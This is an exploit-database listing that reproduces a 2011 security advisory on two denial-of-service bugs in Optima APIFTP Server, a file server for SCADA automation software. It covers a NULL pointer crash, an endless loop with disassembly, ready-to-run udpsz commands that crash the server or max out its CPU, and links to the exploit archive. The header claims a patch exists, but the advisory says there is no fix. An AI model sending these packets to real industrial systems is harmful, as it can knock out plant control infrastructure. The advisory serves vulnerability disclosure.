Optima APIFTP Server - exploit.company

vendor:

Optima APIFTP Server

by:

Luigi Auriemma

7.5

CVSS

HIGH

NULL pointer and endless loop

119, 835

CWE

Product Name: Optima APIFTP Server

Affected Version From: 1.5.2.13

Affected Version To: 1.5.2.13

Patch Exists: YES

Related CWE: N/A

CPE: a:optimalog:optima_apiftp_server

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2011

Optima APIFTP Server <= 1.5.2.13 Vulnerabilities

Optima is a suite of automation software for controlling PLC via SCADA/HMI interface. APIFTP Server is a file server for working with remote files located on shared folders. NULL pointer exploitable through too long path names. The effect is the displaying of a MessageBox with the error and the continuing of the execution that will lead to a stack exaustion after some seconds and the termination of the server. Endless loop with CPU at 100% caused by incomplete packets.

Mitigation:

Upgrade to the latest version of Optima APIFTP Server

Source

Exploit-DB raw data:

#######################################################################

                             Luigi Auriemma

Application:  Optima APIFTP Server
              http://www.optimalog.com/home.html
Versions:     <= 1.5.2.13
Platforms:    Windows
Bugs:         A] NULL pointer
              B] endless loop
Exploitation: remote
Date:         13 Nov 2011
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bugs
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


Optima is a suite of automation software for controlling PLC via
SCADA/HMI interface.
APIFTP Server is a file server for working with remote files located on
shared folders.


#######################################################################

=======
2) Bugs
=======

---------------
A] NULL pointer
---------------

NULL pointer exploitable through too long path names.
The effect is the displaying of a MessageBox with the error and the
continuing of the execution that will lead to a stack exaustion after
some seconds and the termination of the server.


---------------
B] endless loop
---------------

Endless loop with CPU at 100% caused by incomplete packets:

  004A9C93   8B03             /MOV EAX,DWORD PTR DS:[EBX]
  004A9C95   8B80 78010000    |MOV EAX,DWORD PTR DS:[EAX+178]
  004A9C9B   2D B80B0000      |SUB EAX,0BB8     ; Switch (cases BB8..BE0)
  004A9CA0   74 19            |JE SHORT APIFTPSe.004A9CBB
  004A9CA2   83E8 14          |SUB EAX,14
  004A9CA5   74 47            |JE SHORT APIFTPSe.004A9CEE
  004A9CA7   83E8 0A          |SUB EAX,0A
  004A9CAA   0F84 9D000000    |JE APIFTPSe.004A9D4D
  004A9CB0   83E8 0A          |SUB EAX,0A
  004A9CB3   0F84 CA000000    |JE APIFTPSe.004A9D83
  004A9CB9  ^EB D8            |JMP SHORT APIFTPSe.004A9C93


#######################################################################

===========
3) The Code
===========


http://aluigi.org/testz/udpsz.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18112.zip

A]
  udpsz -C "e803 0400 ff" -T -D -3 -d SERVER 10260 0x107

  wait some seconds, the tool will quit automatically

B]
  udpsz -C "e803 0400 00" -T -D SERVER 10260 -1


#######################################################################

======
4) Fix
======


No fix.


#######################################################################